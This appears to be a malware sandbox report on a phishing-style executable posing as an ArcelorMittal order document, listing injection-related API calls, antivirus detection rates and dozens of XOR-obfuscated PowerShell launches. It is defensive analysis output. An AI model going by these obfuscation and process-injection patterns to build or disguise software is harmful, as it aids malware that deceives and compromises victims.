Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0137E030	151_2_0137E030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01377818	151_2_01377818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0137E898	151_2_0137E898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01373330	151_2_01373330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01379B42	151_2_01379B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01378208	151_2_01378208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01371D28	151_2_01371D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01497178	151_2_01497178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01493018	151_2_01493018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_014904D8	151_2_014904D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0149C7D0	151_2_0149C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01499678	151_2_01499678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01495E38	151_2_01495E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0149B310	151_2_0149B310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0149DEF0	151_2_0149DEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0154A0A0	151_2_0154A0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01540B58	151_2_01540B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_01544078	151_2_01544078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_0154B308	151_2_0154B308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_1D305E08	151_2_1D305E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_1D3046C4	151_2_1D3046C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_1D305D20	151_2_1D305D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 151_2_1D306AF1	151_2_1D306AF1

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FB0A49 NtMapViewOfSection,	1_2_02FB0A49
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FAE63C NtAllocateVirtualMemory,	1_2_02FAE63C
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FAFC1A NtProtectVirtualMemory,	1_2_02FAFC1A

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Static PE information: invalid certificate

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	ReversingLabs: Detection: 73%
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Virustotal: Detection: 62%
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Metadefender: Detection: 33%

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

File read: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Jump to behavior

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
